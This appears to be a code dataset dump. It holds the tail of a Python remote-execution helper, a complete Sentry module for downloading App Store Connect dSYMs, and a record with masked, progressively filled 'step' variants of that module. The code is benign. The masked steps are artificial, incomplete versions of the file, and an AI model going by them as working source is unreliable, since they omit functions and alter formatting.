_convert_args(self, args):\n if args:\n if len(args) > 1:\n arguments = str(args).rstrip(')').lstrip('(')\n else:\n arguments = str(args).rstrip(',)').lstrip('(')\n else:\n arguments = ''\n return arguments\n\n\ndump_template = \"\"\"\nif __name__ == '__main__':\n import json, traceback\n obj = {'return': None, 'exception': None}\n try:\n obj['return'] = %s%s\n except Exception:\n obj['exception'] = traceback.format_exc()\n try:\n print(json.dumps(obj).decode('utf-8'))\n except AttributeError:\n print(json.dumps(obj))\n\"\"\"\n\n\nclass JsonModuleExecute(object):\n \"\"\"\n This remote execution class allows to ship Python code over to the remote\n node, load it via ``stdin`` and call any function with arguments. 
The\n resulting response is dumped over JSON so that it can get printed to\n ``stdout``, then captured locally, loaded into regular Python and returned.\n\n If the remote end generates an exception with a traceback, that is captured\n as well and raised accordingly.\n \"\"\"\n\n def __init__(self, conn, module, logger=None, python_executable=None):\n self.conn = conn\n self.module = module\n self._module_source = inspect.getsource(module)\n self.logger = logger\n self.python_executable = python_executable\n\n def __getattr__(self, name):\n if not hasattr(self.module, name):\n msg = \"module %s does not have attribute %s\" % (str(self.module), name)\n raise AttributeError(msg)\n docstring = self._get_func_doc(getattr(self.module, name))\n\n def wrapper(*args):\n if docstring:\n self.logger.debug(docstring)\n if len(args):\n source = self._module_source + dump_template % (name, repr(args))\n else:\n source = self._module_source + dump_template % (name, '()')\n\n # check python interpreter\n if self.python_executable is None:\n self.python_executable = get_python_executable(self.conn)\n\n out, err, code = check(self.conn, [self.python_executable], stdin=source.encode('utf-8'))\n if not out:\n if not err:\n err = [\n 'Traceback (most recent call last):',\n ' File \"<stdin>\", in <module>',\n 'Exception: error calling \"%s\"' % name\n ]\n if code:\n raise Exception('Unexpected remote exception: \\n%s\\n%s' % ('\\n'.join(out), '\\n'.join(err)))\n # at this point, there was no stdout, and the exit code was 0,\n # we must return so that we don't fail trying to serialize back\n # the JSON\n return\n response = json.loads(out[0])\n if response['exception']:\n raise Exception(response['exception'])\n return response['return']\n\n return wrapper\n\n def _get_func_doc(self, func):\n try:\n return getattr(func, 'func_doc').strip()\n except AttributeError:\n return ''\n\n\ndef basic_remote_logger():\n logging.basicConfig()\n logger = logging.getLogger(socket.gethostname())\n logger.setLevel(logging.DEBUG)\n return logger\n\n\ndef needs_ssh(hostname, _socket=None):\n \"\"\"\n Obtains remote hostname of the socket and cuts off the domain part\n of its FQDN.\n \"\"\"\n if hostname.lower() in ['localhost', '127.0.0.1', '127.0.1.1']:\n return False\n _socket = _socket or socket\n fqdn = _socket.getfqdn()\n if hostname == fqdn:\n return False\n local_hostname = _socket.gethostname()\n local_short_hostname = local_hostname.split('.')[0]\n if local_hostname == hostname or local_short_hostname == hostname:\n return False\n return True\n\n\ndef get_python_executable(conn):\n \"\"\"\n Try to determine the remote Python version so that it can be used\n when executing. Avoids the problem of different Python versions, or distros\n that do not use ``python`` but do ``python3``\n \"\"\"\n # executables in order of preference:\n executables = ['python3', 'python', 'python2.7']\n for executable in executables:\n conn.logger.debug('trying to determine remote python executable with %s' % executable)\n out, err, code = check(conn, ['which', executable])\n if code:\n conn.logger.warning('skipping %s, was not found in path' % executable)\n else:\n try:\n return out[0].strip()\n except IndexError:\n conn.logger.warning('could not parse stdout: %s' % out)\n\n # if all fails, we just return whatever the main connection had\n conn.logger.info('Falling back to using interpreter: %s' % conn.interpreter)\n return conn.interpreter\n",
"step-ids": [
19,
23,
27,
30,
31
]
}
|
[
19,
23,
27,
30,
31
] |
"""Tasks for managing Debug Information Files from Apple App Store Connect.
Users can instruct Sentry to download dSYMs from App Store Connect and put them into Sentry's
debug files. These tasks enable this functionality.
"""
import logging
import pathlib
import tempfile
from typing import List, Mapping, Tuple
import requests
import sentry_sdk
from django.utils import timezone
from sentry.lang.native import appconnect
from sentry.models import (
AppConnectBuild,
LatestAppConnectBuildsCheck,
Project,
ProjectOption,
debugfile,
)
from sentry.tasks.base import instrumented_task
from sentry.utils import json, metrics, sdk
from sentry.utils.appleconnect import appstore_connect as appstoreconnect_api
logger = logging.getLogger(__name__)
# Sadly this decorator makes this entire function untyped for now as it does not itself have
# typing annotations. So we do all the work outside of the decorated task function to work
# around this.
# Since all these args must be pickled we keep them to built-in types as well.
@instrumented_task(name="sentry.tasks.app_store_connect.dsym_download", queue="appstoreconnect", ignore_result=True) # type: ignore
def dsym_download(project_id: int, config_id: str) -> None:
inner_dsym_download(project_id=project_id, config_id=config_id)
def inner_dsym_download(project_id: int, config_id: str) -> None:
"""Downloads the dSYMs from App Store Connect and stores them in the Project's debug files."""
with sdk.configure_scope() as scope:
scope.set_tag("project", project_id)
scope.set_tag("config_id", config_id)
project = Project.objects.get(pk=project_id)
config = appconnect.AppStoreConnectConfig.from_project_config(project, config_id)
client = appconnect.AppConnectClient.from_config(config)
listed_builds = client.list_builds()
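    # Determine which of the listed builds still need their dSYMs fetched or updated.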
builds = process_builds(project=project, config=config, to_process=listed_builds)
if not builds:
return
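    # Download and ingest the dSYMs for each pending build in turn.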
for i, (build, build_state) in enumerate(builds):
with sdk.configure_scope() as scope:
scope.set_context("dsym_downloads", {"total": len(builds), "completed": i})
with tempfile.NamedTemporaryFile() as dsyms_zip:
try:
client.download_dsyms(build, pathlib.Path(dsyms_zip.name))
                # If a build has no dSYMs at all, still let it be marked as fetched so it is not
                # repeatedly re-checked every time this task is run.
except appconnect.NoDsymsError:
logger.debug("No dSYMs for build %s", build)
                # Move on to the next build so this one is not checked off as fetched. The dSYM URL
                # will eventually be populated, so revisit it at a later time.
except appconnect.PendingDsymsError:
logger.debug("dSYM url currently unavailable for build %s", build)
continue
                # Return early on unauthorized and forbidden errors to avoid trying all the other
                # builds as well, since an expired token will error for every one of them.
                # The error is also swallowed without being reported because this is an expected
                # and actionable error.
except appstoreconnect_api.UnauthorizedError:
sentry_sdk.capture_message(
"Not authorized to download dSYM using current App Store Connect credentials",
level="info",
)
return
except appstoreconnect_api.ForbiddenError:
sentry_sdk.capture_message(
"Forbidden from downloading dSYM using current App Store Connect credentials",
level="info",
)
return
# Don't let malformed URLs abort all pending downloads in case it's an isolated instance
except ValueError as e:
sdk.capture_exception(e)
continue
# Assume request errors are a server side issue and do not abort all the
# pending downloads.
except appstoreconnect_api.RequestError as e:
sdk.capture_exception(e)
continue
except requests.RequestException as e:
sdk.capture_exception(e)
continue
else:
create_difs_from_dsyms_zip(dsyms_zip.name, project)
logger.debug("Uploaded dSYMs for build %s", build)
metrics.incr("tasks.app_store_connect.builds_ingested", sample_rate=1)
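        # Reached when dSYMs were ingested or the build has none at all; the error paths above
        # return or `continue` instead, leaving the build unfetched for a later run.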
build_state.fetched = True
build_state.save()
def create_difs_from_dsyms_zip(dsyms_zip: str, project: Project) -> None:
with sentry_sdk.start_span(op="dsym-difs", description="Extract difs dSYM zip"):
with open(dsyms_zip, "rb") as fp:
created = debugfile.create_files_from_dif_zip(fp, project, accept_unknown=True)
for proj_debug_file in created:
logger.debug("Created %r for project %s", proj_debug_file, project.id)
def get_or_create_persisted_build(
project: Project, config: appconnect.AppStoreConnectConfig, build: appconnect.BuildInfo
) -> AppConnectBuild:
"""Fetches the sentry-internal :class:`AppConnectBuild`.
The build corresponds to the :class:`appconnect.BuildInfo` as returned by the
AppStore Connect API. If no build exists yet, a new "pending" build is created.
"""
try:
build_state = AppConnectBuild.objects.get(
project=project,
app_id=build.app_id,
platform=build.platform,
bundle_short_version=build.version,
bundle_version=build.build_number,
)
except AppConnectBuild.DoesNotExist:
build_state = AppConnectBuild(
project=project,
app_id=build.app_id,
bundle_id=config.bundleId,
platform=build.platform,
bundle_short_version=build.version,
bundle_version=build.build_number,
uploaded_to_appstore=build.uploaded_date,
first_seen=timezone.now(),
fetched=False,
)
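        # Persist the new pending build right away so other runs can see it.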
build_state.save()
return build_state
def process_builds(
project: Project,
config: appconnect.AppStoreConnectConfig,
to_process: List[appconnect.BuildInfo],
) -> List[Tuple[appconnect.BuildInfo, AppConnectBuild]]:
"""Returns a list of builds whose dSYMs need to be updated or fetched.
This will create a new "pending" :class:`AppConnectBuild` for any :class:`appconnect.BuildInfo`
that cannot be found in the DB. These pending :class:`AppConnectBuild`s are immediately saved
upon creation.
"""
pending_builds = []
with sentry_sdk.start_span(
op="appconnect-update-builds", description="Update AppStoreConnect builds in database"
):
for build in to_process:
build_state = get_or_create_persisted_build(project, config, build)
if not build_state.fetched:
pending_builds.append((build, build_state))
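        # Record that this symbol source was checked now, even if no new builds were found.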
LatestAppConnectBuildsCheck.objects.create_or_update(
project=project, source_id=config.id, values={"last_checked": timezone.now()}
)
return pending_builds
# An untyped decorator would stop type-checking of the entire function, so the work is split
# into an inner function instead, which can be type-checked.
@instrumented_task( # type: ignore
name="sentry.tasks.app_store_connect.refresh_all_builds",
queue="appstoreconnect",
ignore_result=True,
)
def refresh_all_builds() -> None:
inner_refresh_all_builds()
def inner_refresh_all_builds() -> None:
"""Refreshes all AppStoreConnect builds for all projects.
    This iterates over all the projects configured in Sentry and, for any that have an
    AppStoreConnect symbol source configured, polls the AppStoreConnect API to check if
    there are new builds.
"""
# We have no way to query for AppStore Connect symbol sources directly, but
# getting all of the project options that have custom symbol sources
# configured is a reasonable compromise, as the number of those should be
# low enough to traverse every hour.
# Another alternative would be to get a list of projects that have had a
# previous successful import, as indicated by existing `AppConnectBuild`
# objects. But that would miss projects that have a valid AppStore Connect
# setup, but have not yet published any kind of build to AppStore.
options = ProjectOption.objects.filter(key=appconnect.SYMBOL_SOURCES_PROP_NAME)
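    # Count the dsym_download tasks scheduled so the gauge below reflects this run.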
count = 0
for option in options:
with sdk.push_scope() as scope:
scope.set_tag("project", option.project_id)
try:
if not option.value:
                    # An empty string was set as the option value; the UI does this when deleting
                    # all sources. An empty string is not valid JSON.
continue
# We are parsing JSON thus all types are Any, so give the type-checker some
# extra help. We are maybe slightly lying about the type, but the
# attributes we do access are all string values.
all_sources: List[Mapping[str, str]] = json.loads(option.value)
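                # Each configured source is expected to provide at least an "id" and a "type".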
for source in all_sources:
try:
source_id = source["id"]
source_type = source["type"]
except KeyError:
logger.exception("Malformed symbol source")
continue
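                    # Only App Store Connect sources trigger a dSYM download; other source types are skipped.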
if source_type == appconnect.SYMBOL_SOURCE_TYPE_NAME:
dsym_download.apply_async(
kwargs={
"project_id": option.project_id,
"config_id": source_id,
}
)
count += 1
except Exception:
logger.exception("Failed to refresh AppStoreConnect builds")
metrics.gauge("tasks.app_store_connect.refreshed", count, sample_rate=1)
|
normal
|
{
"blob_id": "51bc2668a9f9f4425166f9e6da72b7a1c37baa01",
"index": 9628,
"step-1": "<mask token>\n\n\ndef inner_dsym_download(project_id: int, config_id: str) ->None:\n \"\"\"Downloads the dSYMs from App Store Connect and stores them in the Project's debug files.\"\"\"\n with sdk.configure_scope() as scope:\n scope.set_tag('project', project_id)\n scope.set_tag('config_id', config_id)\n project = Project.objects.get(pk=project_id)\n config = appconnect.AppStoreConnectConfig.from_project_config(project,\n config_id)\n client = appconnect.AppConnectClient.from_config(config)\n listed_builds = client.list_builds()\n builds = process_builds(project=project, config=config, to_process=\n listed_builds)\n if not builds:\n return\n for i, (build, build_state) in enumerate(builds):\n with sdk.configure_scope() as scope:\n scope.set_context('dsym_downloads', {'total': len(builds),\n 'completed': i})\n with tempfile.NamedTemporaryFile() as dsyms_zip:\n try:\n client.download_dsyms(build, pathlib.Path(dsyms_zip.name))\n except appconnect.NoDsymsError:\n logger.debug('No dSYMs for build %s', build)\n except appconnect.PendingDsymsError:\n logger.debug('dSYM url currently unavailable for build %s',\n build)\n continue\n except appstoreconnect_api.UnauthorizedError:\n sentry_sdk.capture_message(\n 'Not authorized to download dSYM using current App Store Connect credentials'\n , level='info')\n return\n except appstoreconnect_api.ForbiddenError:\n sentry_sdk.capture_message(\n 'Forbidden from downloading dSYM using current App Store Connect credentials'\n , level='info')\n return\n except ValueError as e:\n sdk.capture_exception(e)\n continue\n except appstoreconnect_api.RequestError as e:\n sdk.capture_exception(e)\n continue\n except requests.RequestException as e:\n sdk.capture_exception(e)\n continue\n else:\n create_difs_from_dsyms_zip(dsyms_zip.name, project)\n logger.debug('Uploaded dSYMs for build %s', build)\n metrics.incr('tasks.app_store_connect.builds_ingested',\n sample_rate=1)\n build_state.fetched = True\n build_state.save()\n\n\n<mask token>\n\n\ndef process_builds(project: Project, config: appconnect.\n AppStoreConnectConfig, to_process: List[appconnect.BuildInfo]) ->List[Tuple\n [appconnect.BuildInfo, AppConnectBuild]]:\n \"\"\"Returns a list of builds whose dSYMs need to be updated or fetched.\n\n This will create a new \"pending\" :class:`AppConnectBuild` for any :class:`appconnect.BuildInfo`\n that cannot be found in the DB. These pending :class:`AppConnectBuild`s are immediately saved\n upon creation.\n \"\"\"\n pending_builds = []\n with sentry_sdk.start_span(op='appconnect-update-builds', description=\n 'Update AppStoreConnect builds in database'):\n for build in to_process:\n build_state = get_or_create_persisted_build(project, config, build)\n if not build_state.fetched:\n pending_builds.append((build, build_state))\n LatestAppConnectBuildsCheck.objects.create_or_update(project=project,\n source_id=config.id, values={'last_checked': timezone.now()})\n return pending_builds\n\n\n@instrumented_task(name='sentry.tasks.app_store_connect.refresh_all_builds',\n queue='appstoreconnect', ignore_result=True)\ndef refresh_all_builds() ->None:\n inner_refresh_all_builds()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef inner_dsym_download(project_id: int, config_id: str) ->None:\n \"\"\"Downloads the dSYMs from App Store Connect and stores them in the Project's debug files.\"\"\"\n with sdk.configure_scope() as scope:\n scope.set_tag('project', project_id)\n scope.set_tag('config_id', config_id)\n project = Project.objects.get(pk=project_id)\n config = appconnect.AppStoreConnectConfig.from_project_config(project,\n config_id)\n client = appconnect.AppConnectClient.from_config(config)\n listed_builds = client.list_builds()\n builds = process_builds(project=project, config=config, to_process=\n listed_builds)\n if not builds:\n return\n for i, (build, build_state) in enumerate(builds):\n with sdk.configure_scope() as scope:\n scope.set_context('dsym_downloads', {'total': len(builds),\n 'completed': i})\n with tempfile.NamedTemporaryFile() as dsyms_zip:\n try:\n client.download_dsyms(build, pathlib.Path(dsyms_zip.name))\n except appconnect.NoDsymsError:\n logger.debug('No dSYMs for build %s', build)\n except appconnect.PendingDsymsError:\n logger.debug('dSYM url currently unavailable for build %s',\n build)\n continue\n except appstoreconnect_api.UnauthorizedError:\n sentry_sdk.capture_message(\n 'Not authorized to download dSYM using current App Store Connect credentials'\n , level='info')\n return\n except appstoreconnect_api.ForbiddenError:\n sentry_sdk.capture_message(\n 'Forbidden from downloading dSYM using current App Store Connect credentials'\n , level='info')\n return\n except ValueError as e:\n sdk.capture_exception(e)\n continue\n except appstoreconnect_api.RequestError as e:\n sdk.capture_exception(e)\n continue\n except requests.RequestException as e:\n sdk.capture_exception(e)\n continue\n else:\n create_difs_from_dsyms_zip(dsyms_zip.name, project)\n logger.debug('Uploaded dSYMs for build %s', build)\n metrics.incr('tasks.app_store_connect.builds_ingested',\n sample_rate=1)\n build_state.fetched = True\n build_state.save()\n\n\ndef create_difs_from_dsyms_zip(dsyms_zip: str, project: Project) ->None:\n with sentry_sdk.start_span(op='dsym-difs', description=\n 'Extract difs dSYM zip'):\n with open(dsyms_zip, 'rb') as fp:\n created = debugfile.create_files_from_dif_zip(fp, project,\n accept_unknown=True)\n for proj_debug_file in created:\n logger.debug('Created %r for project %s', proj_debug_file,\n project.id)\n\n\ndef get_or_create_persisted_build(project: Project, config: appconnect.\n AppStoreConnectConfig, build: appconnect.BuildInfo) ->AppConnectBuild:\n \"\"\"Fetches the sentry-internal :class:`AppConnectBuild`.\n\n The build corresponds to the :class:`appconnect.BuildInfo` as returned by the\n AppStore Connect API. 
If no build exists yet, a new \"pending\" build is created.\n \"\"\"\n try:\n build_state = AppConnectBuild.objects.get(project=project, app_id=\n build.app_id, platform=build.platform, bundle_short_version=\n build.version, bundle_version=build.build_number)\n except AppConnectBuild.DoesNotExist:\n build_state = AppConnectBuild(project=project, app_id=build.app_id,\n bundle_id=config.bundleId, platform=build.platform,\n bundle_short_version=build.version, bundle_version=build.\n build_number, uploaded_to_appstore=build.uploaded_date,\n first_seen=timezone.now(), fetched=False)\n build_state.save()\n return build_state\n\n\ndef process_builds(project: Project, config: appconnect.\n AppStoreConnectConfig, to_process: List[appconnect.BuildInfo]) ->List[Tuple\n [appconnect.BuildInfo, AppConnectBuild]]:\n \"\"\"Returns a list of builds whose dSYMs need to be updated or fetched.\n\n This will create a new \"pending\" :class:`AppConnectBuild` for any :class:`appconnect.BuildInfo`\n that cannot be found in the DB. These pending :class:`AppConnectBuild`s are immediately saved\n upon creation.\n \"\"\"\n pending_builds = []\n with sentry_sdk.start_span(op='appconnect-update-builds', description=\n 'Update AppStoreConnect builds in database'):\n for build in to_process:\n build_state = get_or_create_persisted_build(project, config, build)\n if not build_state.fetched:\n pending_builds.append((build, build_state))\n LatestAppConnectBuildsCheck.objects.create_or_update(project=project,\n source_id=config.id, values={'last_checked': timezone.now()})\n return pending_builds\n\n\n@instrumented_task(name='sentry.tasks.app_store_connect.refresh_all_builds',\n queue='appstoreconnect', ignore_result=True)\ndef refresh_all_builds() ->None:\n inner_refresh_all_builds()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@instrumented_task(name='sentry.tasks.app_store_connect.dsym_download',\n queue='appstoreconnect', ignore_result=True)\ndef dsym_download(project_id: int, config_id: str) ->None:\n inner_dsym_download(project_id=project_id, config_id=config_id)\n\n\ndef inner_dsym_download(project_id: int, config_id: str) ->None:\n \"\"\"Downloads the dSYMs from App Store Connect and stores them in the Project's debug files.\"\"\"\n with sdk.configure_scope() as scope:\n scope.set_tag('project', project_id)\n scope.set_tag('config_id', config_id)\n project = Project.objects.get(pk=project_id)\n config = appconnect.AppStoreConnectConfig.from_project_config(project,\n config_id)\n client = appconnect.AppConnectClient.from_config(config)\n listed_builds = client.list_builds()\n builds = process_builds(project=project, config=config, to_process=\n listed_builds)\n if not builds:\n return\n for i, (build, build_state) in enumerate(builds):\n with sdk.configure_scope() as scope:\n scope.set_context('dsym_downloads', {'total': len(builds),\n 'completed': i})\n with tempfile.NamedTemporaryFile() as dsyms_zip:\n try:\n client.download_dsyms(build, pathlib.Path(dsyms_zip.name))\n except appconnect.NoDsymsError:\n logger.debug('No dSYMs for build %s', build)\n except appconnect.PendingDsymsError:\n logger.debug('dSYM url currently unavailable for build %s',\n build)\n continue\n except appstoreconnect_api.UnauthorizedError:\n sentry_sdk.capture_message(\n 'Not authorized to download dSYM using current App Store Connect credentials'\n , level='info')\n return\n except appstoreconnect_api.ForbiddenError:\n sentry_sdk.capture_message(\n 'Forbidden from downloading dSYM using current App Store Connect credentials'\n , level='info')\n return\n except ValueError as e:\n sdk.capture_exception(e)\n continue\n except appstoreconnect_api.RequestError as e:\n sdk.capture_exception(e)\n continue\n except requests.RequestException as e:\n sdk.capture_exception(e)\n continue\n else:\n create_difs_from_dsyms_zip(dsyms_zip.name, project)\n logger.debug('Uploaded dSYMs for build %s', build)\n metrics.incr('tasks.app_store_connect.builds_ingested',\n sample_rate=1)\n build_state.fetched = True\n build_state.save()\n\n\ndef create_difs_from_dsyms_zip(dsyms_zip: str, project: Project) ->None:\n with sentry_sdk.start_span(op='dsym-difs', description=\n 'Extract difs dSYM zip'):\n with open(dsyms_zip, 'rb') as fp:\n created = debugfile.create_files_from_dif_zip(fp, project,\n accept_unknown=True)\n for proj_debug_file in created:\n logger.debug('Created %r for project %s', proj_debug_file,\n project.id)\n\n\ndef get_or_create_persisted_build(project: Project, config: appconnect.\n AppStoreConnectConfig, build: appconnect.BuildInfo) ->AppConnectBuild:\n \"\"\"Fetches the sentry-internal :class:`AppConnectBuild`.\n\n The build corresponds to the :class:`appconnect.BuildInfo` as returned by the\n AppStore Connect API. 
If no build exists yet, a new \"pending\" build is created.\n \"\"\"\n try:\n build_state = AppConnectBuild.objects.get(project=project, app_id=\n build.app_id, platform=build.platform, bundle_short_version=\n build.version, bundle_version=build.build_number)\n except AppConnectBuild.DoesNotExist:\n build_state = AppConnectBuild(project=project, app_id=build.app_id,\n bundle_id=config.bundleId, platform=build.platform,\n bundle_short_version=build.version, bundle_version=build.\n build_number, uploaded_to_appstore=build.uploaded_date,\n first_seen=timezone.now(), fetched=False)\n build_state.save()\n return build_state\n\n\ndef process_builds(project: Project, config: appconnect.\n AppStoreConnectConfig, to_process: List[appconnect.BuildInfo]) ->List[Tuple\n [appconnect.BuildInfo, AppConnectBuild]]:\n \"\"\"Returns a list of builds whose dSYMs need to be updated or fetched.\n\n This will create a new \"pending\" :class:`AppConnectBuild` for any :class:`appconnect.BuildInfo`\n that cannot be found in the DB. These pending :class:`AppConnectBuild`s are immediately saved\n upon creation.\n \"\"\"\n pending_builds = []\n with sentry_sdk.start_span(op='appconnect-update-builds', description=\n 'Update AppStoreConnect builds in database'):\n for build in to_process:\n build_state = get_or_create_persisted_build(project, config, build)\n if not build_state.fetched:\n pending_builds.append((build, build_state))\n LatestAppConnectBuildsCheck.objects.create_or_update(project=project,\n source_id=config.id, values={'last_checked': timezone.now()})\n return pending_builds\n\n\n@instrumented_task(name='sentry.tasks.app_store_connect.refresh_all_builds',\n queue='appstoreconnect', ignore_result=True)\ndef refresh_all_builds() ->None:\n inner_refresh_all_builds()\n\n\ndef inner_refresh_all_builds() ->None:\n \"\"\"Refreshes all AppStoreConnect builds for all projects.\n\n This iterates over all the projects configured in Sentry and for any which has an\n AppStoreConnect symbol source configured will poll the AppStoreConnect API to check if\n there are new builds.\n \"\"\"\n options = ProjectOption.objects.filter(key=appconnect.\n SYMBOL_SOURCES_PROP_NAME)\n count = 0\n for option in options:\n with sdk.push_scope() as scope:\n scope.set_tag('project', option.project_id)\n try:\n if not option.value:\n continue\n all_sources: List[Mapping[str, str]] = json.loads(option.value)\n for source in all_sources:\n try:\n source_id = source['id']\n source_type = source['type']\n except KeyError:\n logger.exception('Malformed symbol source')\n continue\n if source_type == appconnect.SYMBOL_SOURCE_TYPE_NAME:\n dsym_download.apply_async(kwargs={'project_id':\n option.project_id, 'config_id': source_id})\n count += 1\n except Exception:\n logger.exception('Failed to refresh AppStoreConnect builds')\n metrics.gauge('tasks.app_store_connect.refreshed', count, sample_rate=1)\n",
"step-4": "<mask token>\nimport logging\nimport pathlib\nimport tempfile\nfrom typing import List, Mapping, Tuple\nimport requests\nimport sentry_sdk\nfrom django.utils import timezone\nfrom sentry.lang.native import appconnect\nfrom sentry.models import AppConnectBuild, LatestAppConnectBuildsCheck, Project, ProjectOption, debugfile\nfrom sentry.tasks.base import instrumented_task\nfrom sentry.utils import json, metrics, sdk\nfrom sentry.utils.appleconnect import appstore_connect as appstoreconnect_api\nlogger = logging.getLogger(__name__)\n\n\n@instrumented_task(name='sentry.tasks.app_store_connect.dsym_download',\n queue='appstoreconnect', ignore_result=True)\ndef dsym_download(project_id: int, config_id: str) ->None:\n inner_dsym_download(project_id=project_id, config_id=config_id)\n\n\ndef inner_dsym_download(project_id: int, config_id: str) ->None:\n \"\"\"Downloads the dSYMs from App Store Connect and stores them in the Project's debug files.\"\"\"\n with sdk.configure_scope() as scope:\n scope.set_tag('project', project_id)\n scope.set_tag('config_id', config_id)\n project = Project.objects.get(pk=project_id)\n config = appconnect.AppStoreConnectConfig.from_project_config(project,\n config_id)\n client = appconnect.AppConnectClient.from_config(config)\n listed_builds = client.list_builds()\n builds = process_builds(project=project, config=config, to_process=\n listed_builds)\n if not builds:\n return\n for i, (build, build_state) in enumerate(builds):\n with sdk.configure_scope() as scope:\n scope.set_context('dsym_downloads', {'total': len(builds),\n 'completed': i})\n with tempfile.NamedTemporaryFile() as dsyms_zip:\n try:\n client.download_dsyms(build, pathlib.Path(dsyms_zip.name))\n except appconnect.NoDsymsError:\n logger.debug('No dSYMs for build %s', build)\n except appconnect.PendingDsymsError:\n logger.debug('dSYM url currently unavailable for build %s',\n build)\n continue\n except appstoreconnect_api.UnauthorizedError:\n sentry_sdk.capture_message(\n 'Not authorized to download dSYM using current App Store Connect credentials'\n , level='info')\n return\n except appstoreconnect_api.ForbiddenError:\n sentry_sdk.capture_message(\n 'Forbidden from downloading dSYM using current App Store Connect credentials'\n , level='info')\n return\n except ValueError as e:\n sdk.capture_exception(e)\n continue\n except appstoreconnect_api.RequestError as e:\n sdk.capture_exception(e)\n continue\n except requests.RequestException as e:\n sdk.capture_exception(e)\n continue\n else:\n create_difs_from_dsyms_zip(dsyms_zip.name, project)\n logger.debug('Uploaded dSYMs for build %s', build)\n metrics.incr('tasks.app_store_connect.builds_ingested',\n sample_rate=1)\n build_state.fetched = True\n build_state.save()\n\n\ndef create_difs_from_dsyms_zip(dsyms_zip: str, project: Project) ->None:\n with sentry_sdk.start_span(op='dsym-difs', description=\n 'Extract difs dSYM zip'):\n with open(dsyms_zip, 'rb') as fp:\n created = debugfile.create_files_from_dif_zip(fp, project,\n accept_unknown=True)\n for proj_debug_file in created:\n logger.debug('Created %r for project %s', proj_debug_file,\n project.id)\n\n\ndef get_or_create_persisted_build(project: Project, config: appconnect.\n AppStoreConnectConfig, build: appconnect.BuildInfo) ->AppConnectBuild:\n \"\"\"Fetches the sentry-internal :class:`AppConnectBuild`.\n\n The build corresponds to the :class:`appconnect.BuildInfo` as returned by the\n AppStore Connect API. 
If no build exists yet, a new \"pending\" build is created.\n \"\"\"\n try:\n build_state = AppConnectBuild.objects.get(project=project, app_id=\n build.app_id, platform=build.platform, bundle_short_version=\n build.version, bundle_version=build.build_number)\n except AppConnectBuild.DoesNotExist:\n build_state = AppConnectBuild(project=project, app_id=build.app_id,\n bundle_id=config.bundleId, platform=build.platform,\n bundle_short_version=build.version, bundle_version=build.\n build_number, uploaded_to_appstore=build.uploaded_date,\n first_seen=timezone.now(), fetched=False)\n build_state.save()\n return build_state\n\n\ndef process_builds(project: Project, config: appconnect.\n AppStoreConnectConfig, to_process: List[appconnect.BuildInfo]) ->List[Tuple\n [appconnect.BuildInfo, AppConnectBuild]]:\n \"\"\"Returns a list of builds whose dSYMs need to be updated or fetched.\n\n This will create a new \"pending\" :class:`AppConnectBuild` for any :class:`appconnect.BuildInfo`\n that cannot be found in the DB. These pending :class:`AppConnectBuild`s are immediately saved\n upon creation.\n \"\"\"\n pending_builds = []\n with sentry_sdk.start_span(op='appconnect-update-builds', description=\n 'Update AppStoreConnect builds in database'):\n for build in to_process:\n build_state = get_or_create_persisted_build(project, config, build)\n if not build_state.fetched:\n pending_builds.append((build, build_state))\n LatestAppConnectBuildsCheck.objects.create_or_update(project=project,\n source_id=config.id, values={'last_checked': timezone.now()})\n return pending_builds\n\n\n@instrumented_task(name='sentry.tasks.app_store_connect.refresh_all_builds',\n queue='appstoreconnect', ignore_result=True)\ndef refresh_all_builds() ->None:\n inner_refresh_all_builds()\n\n\ndef inner_refresh_all_builds() ->None:\n \"\"\"Refreshes all AppStoreConnect builds for all projects.\n\n This iterates over all the projects configured in Sentry and for any which has an\n AppStoreConnect symbol source configured will poll the AppStoreConnect API to check if\n there are new builds.\n \"\"\"\n options = ProjectOption.objects.filter(key=appconnect.\n SYMBOL_SOURCES_PROP_NAME)\n count = 0\n for option in options:\n with sdk.push_scope() as scope:\n scope.set_tag('project', option.project_id)\n try:\n if not option.value:\n continue\n all_sources: List[Mapping[str, str]] = json.loads(option.value)\n for source in all_sources:\n try:\n source_id = source['id']\n source_type = source['type']\n except KeyError:\n logger.exception('Malformed symbol source')\n continue\n if source_type == appconnect.SYMBOL_SOURCE_TYPE_NAME:\n dsym_download.apply_async(kwargs={'project_id':\n option.project_id, 'config_id': source_id})\n count += 1\n except Exception:\n logger.exception('Failed to refresh AppStoreConnect builds')\n metrics.gauge('tasks.app_store_connect.refreshed', count, sample_rate=1)\n",
"step-5": "\"\"\"Tasks for managing Debug Information Files from Apple App Store Connect.\n\nUsers can instruct Sentry to download dSYM from App Store Connect and put them into Sentry's\ndebug files. These tasks enable this functionality.\n\"\"\"\n\nimport logging\nimport pathlib\nimport tempfile\nfrom typing import List, Mapping, Tuple\n\nimport requests\nimport sentry_sdk\nfrom django.utils import timezone\n\nfrom sentry.lang.native import appconnect\nfrom sentry.models import (\n AppConnectBuild,\n LatestAppConnectBuildsCheck,\n Project,\n ProjectOption,\n debugfile,\n)\nfrom sentry.tasks.base import instrumented_task\nfrom sentry.utils import json, metrics, sdk\nfrom sentry.utils.appleconnect import appstore_connect as appstoreconnect_api\n\nlogger = logging.getLogger(__name__)\n\n\n# Sadly this decorator makes this entire function untyped for now as it does not itself have\n# typing annotations. So we do all the work outside of the decorated task function to work\n# around this.\n# Since all these args must be pickled we keep them to built-in types as well.\n@instrumented_task(name=\"sentry.tasks.app_store_connect.dsym_download\", queue=\"appstoreconnect\", ignore_result=True) # type: ignore\ndef dsym_download(project_id: int, config_id: str) -> None:\n inner_dsym_download(project_id=project_id, config_id=config_id)\n\n\ndef inner_dsym_download(project_id: int, config_id: str) -> None:\n \"\"\"Downloads the dSYMs from App Store Connect and stores them in the Project's debug files.\"\"\"\n with sdk.configure_scope() as scope:\n scope.set_tag(\"project\", project_id)\n scope.set_tag(\"config_id\", config_id)\n\n project = Project.objects.get(pk=project_id)\n config = appconnect.AppStoreConnectConfig.from_project_config(project, config_id)\n client = appconnect.AppConnectClient.from_config(config)\n\n listed_builds = client.list_builds()\n builds = process_builds(project=project, config=config, to_process=listed_builds)\n\n if not builds:\n return\n\n for i, (build, build_state) in enumerate(builds):\n with sdk.configure_scope() as scope:\n scope.set_context(\"dsym_downloads\", {\"total\": len(builds), \"completed\": i})\n with tempfile.NamedTemporaryFile() as dsyms_zip:\n try:\n client.download_dsyms(build, pathlib.Path(dsyms_zip.name))\n # For no dSYMs, let the build be marked as fetched so they're not\n # repeatedly re-checked every time this task is run.\n except appconnect.NoDsymsError:\n 